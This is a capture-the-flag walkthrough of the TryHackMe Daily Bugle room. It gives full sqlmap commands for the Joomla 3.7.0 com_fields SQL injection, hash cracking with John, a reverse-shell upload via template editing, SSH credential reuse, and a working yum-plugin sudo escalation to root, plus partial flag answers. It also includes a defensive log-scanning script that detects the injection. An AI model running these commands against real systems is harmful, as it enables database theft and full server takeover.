Amazing TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle is a challenge to compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

Difficulty: Hard

TryHackMe Daily Bugle

Daily Bugle WriteUp

Access the web server, who robbed the bank?


Scan Target Machine with Nmap

nmap -sV -sC --script=vuln 10.10.155.246

Find Joomla Version

The Joomla version is already in the Nmap output, but if you need to check it manually:

wget http://10.10.204.53/README.txt
wget http://10.10.204.53/administrator/manifests/files/joomla.xml 

Crack Jonah Password

Crack the hash? But where is the hash?

We have Joomla CMS version 3.7.0, and Nmap tells us there is a public exploit for it; let’s search for it:

searchsploit joomla 3.7.0

Great, we find one that uses SQL injection in a single vulnerable parameter.

Copy the exploit to our home folder and read it:

searchsploit -m 42033.txt
less /root/42033.txt

SQLMap Command

Enumerate All Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Read System Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hex

Read Tables from Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex

We have 72 tables; which one is the users table?

Let’s extract the #__users table data, hoping to find Jonah’s password hash.

Extract data from the #__users table

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex
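To show the defender’s side of the com_fields injection used above, here is an added example (not part of the original write-up) that scans Apache combined-format access log lines and flags requests to com_fields whose list[fullordering] value is not a plain column name with an optional ASC/DESC, which is all Joomla’s list ordering legitimately needs. The log lines are constructed samples, not data from the room.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access log lines (combined format); only the third one
# abuses list[fullordering] the way the sqlmap commands above do.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2020:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2020:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2020:10:00:03 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%28%29 HTTP/1.1" 500 0 "-" "sqlmap/1.3"
"""

# A legitimate ordering value is a column reference plus an optional direction.
LEGIT_ORDERING = re.compile(r"^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$", re.IGNORECASE)
# SQL tokens that never belong in an ordering value (error-based / blind probes).
SQL_TOKENS = ("updatexml", "extractvalue", "concat", "select", "union", "sleep", "benchmark")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def inspect_request(path):
    """Return the reasons a request looks like the com_fields injection; [] if clean."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)  # decodes %5B / %5D
    if qs.get("option") != ["com_fields"]:
        return []
    reasons = []
    for value in qs.get("list[fullordering]", []):
        if not LEGIT_ORDERING.match(value):
            reasons.append("fullordering is not a plain column/direction: %r" % value)
        hits = [t for t in SQL_TOKENS if t in value.lower()]
        if hits:
            reasons.append("SQL token(s) in fullordering: " + ",".join(hits))
    return reasons

def scan_log(text):
    """Run inspect_request over every parsable line and collect alerts."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect_request(rec["path"])
        if reasons:
            alerts.append({"ip": rec["ip"], "ua": rec["ua"], "status": rec["status"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The allowlist check catches payloads that do not use the listed tokens; the token list only adds a descriptive reason for the common error-based probes.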

Crack Jonah Password Hash

john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txt
john jonah_hash.txt --show

Log in to the Joomla Administration as Jonah

http://10.10.204.53/administrator
username - jonah
password - the one cracked from the hash

Upload Reverse Shell to Joomla

http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D
pwd

Investigate File System

First, let’s investigate the Joomla folder:

cd /var/www/html
ls -la

Great, we have the MySQL root password; let’s check whether the MySQL daemon is running as root:

ps aux | grep mysql

No success, the MySQL service is running as the mysql user 🙁

What if the user jjameson uses the same password as the MySQL root user?

Let’s try to open an SSH connection as jjameson:

ssh jjameson@10.10.204.53

Find User Flag

Elevate Privileges from JJameson user to Root

sudo -l

As we can see, the jjameson user can execute the yum command with sudo; let’s find out how to elevate privileges using yum.

cd /tmp
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y

Answer the questions below

What is the Joomla version?

3.7.0

*Instead of using SQLMap, why not use a python script!*

What is Jonah’s cracked password?

spider*RFS*

What is the user flag?

27a260fe3cba712cfde*RFS*

What is the root flag?

eec3d53292b1821868*RFS*

GTFOBins

Exploit Joomla 3.7.0

Room name: Daily Bugle
OS: Linux
Difficulty: Hard
Room Link: tryhackme.com/room/dailybugle
Creator: Tryhackme